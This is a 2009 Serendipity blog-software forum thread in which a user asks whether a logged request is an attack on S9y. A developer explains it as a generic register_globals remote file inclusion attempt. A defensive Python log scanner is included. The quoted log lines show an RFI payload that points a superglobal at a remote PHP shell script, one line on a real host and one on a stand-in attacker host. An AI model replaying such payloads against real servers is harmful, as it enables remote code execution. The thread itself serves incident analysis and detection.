general exploit or specifically for S9y?

rowi
Regular
Posts: 77
Joined: Fri Mar 16, 2007 9:10 pm
Location: Flensburg / Germany

general exploit or specifically for S9y?

Post by rowi »

I just stumbled over an interesting access in the error_log:

Code:

193.63.251.123 - - [08/Sep/2009:15:04:02 +0200] "GET /serendipity_admin_image_sel...em&serendipity%5bimage%5d=639/?_SERVER%5bDOCUMENT_ROOT%5d=http://shop.kbench.com/xml/ec.txt%3f HTTP/1.1" 404 348 "-" "libwww-perl/5.79"
The ec.txt is a PHP script which tries to execute shell commands.

Seems like an exploit attempt you often see, but the selective access to serendipity_admin_image_sel...em makes me wonder if it's a dedicated attempt to exploit S9y, as it is nowhere linked. On the other hand, the image_selector which is obviously meant is written incorrectly, which would speak against a specific exploit.

Anyone?
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany

Re: general exploit or specifically for S9y?

Post by garvinhicking »

Hi!

Thanks for notifying... At least I couldn't see any attack vectors on these variables. To me it seems a more general exploit that simply tries to append a global _SERVER variable and relies on the PHP register_globals setting; that might work independently of which PHP application is used.

The forum here cut the URL, but are you able to execute the full URL and see what output you get? The exploit would at least give you a "Mic22" output somewhere inside the HTML, if anything was affected at all.

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
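A small log check for the pattern discussed above, added here as an example and not part of this thread or of Serendipity: it parses Apache combined-format lines (constructed samples modelled on the request rowi posted, with placeholder addresses and host) and flags query parameters that try to set a PHP superglobal, which only has an effect with register_globals on, plus parameter values that point at a remote URL.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format; named groups are the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# PHP superglobals: with register_globals=On, a query parameter named like
# _SERVER[DOCUMENT_ROOT] can overwrite the real value before a script
# concatenates it into an include() path (remote file inclusion).
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_REQUEST",
                "_FILES", "_ENV", "_SESSION", "GLOBALS"}
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def analyse(line):
    """Describe one log line; None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qsl percent-decodes names and values, so %5b/%5d become [ and ].
    for name, value in parse_qsl(urlsplit(m.group("target")).query,
                                 keep_blank_values=True):
        if name.split("[", 1)[0] in SUPERGLOBALS:
            findings.append("superglobal override attempt: " + name)
        if REMOTE_URL.match(value):
            findings.append("remote URL supplied in " + name + ": " + value)
    return {
        "ip": m.group("ip"),
        "status": m.group("status"),
        # A 404, as in the thread, means no PHP script handled the URL; the
        # same pattern with a 2xx status is the one to investigate first.
        "served": m.group("status").startswith("2"),
        "findings": findings,
    }

def scan(lines):
    """Return only the parsed lines that carry at least one finding."""
    return [r for r in map(analyse, lines) if r and r["findings"]]

# Constructed sample lines (placeholder addresses and host), modelled on the
# request quoted in the first post; the second line is ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Sep/2009:15:04:02 +0200] "GET /serendipity_admin_image_selector.php'
    '?serendipity%5bimage%5d=639&_SERVER%5bDOCUMENT_ROOT%5d=http://attacker.example/ec.txt%3f'
    ' HTTP/1.1" 404 348 "-" "libwww-perl/5.79"',
    '198.51.100.4 - - [08/Sep/2009:15:05:10 +0200] "GET /index.php?/archives/12-hello.html'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Running `scan(SAMPLE_LOG)` returns only the first line, with two findings; on a real log, lines where `served` is true are the ones worth checking against the "Mic22" marker Garvin mentions.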
rowi
Regular
Posts: 77
Joined: Fri Mar 16, 2007 9:10 pm
Location: Flensburg / Germany

Re: general exploit or specifically for S9y?

Post by rowi »

The URL is correct the way it's shown (at least to me); the requested file is "serendipity_admin_image_sel...em" with the dots. If it was shortened, that was done by the web server prior to logging, which I don't believe.
That's what made me curious: on one hand it tries to access specifically a file which seems to be serendipity_admin_image_selector.php, on the other hand the name is not correctly spelled.
If I try to access the URL I get a 404 error, like the original request.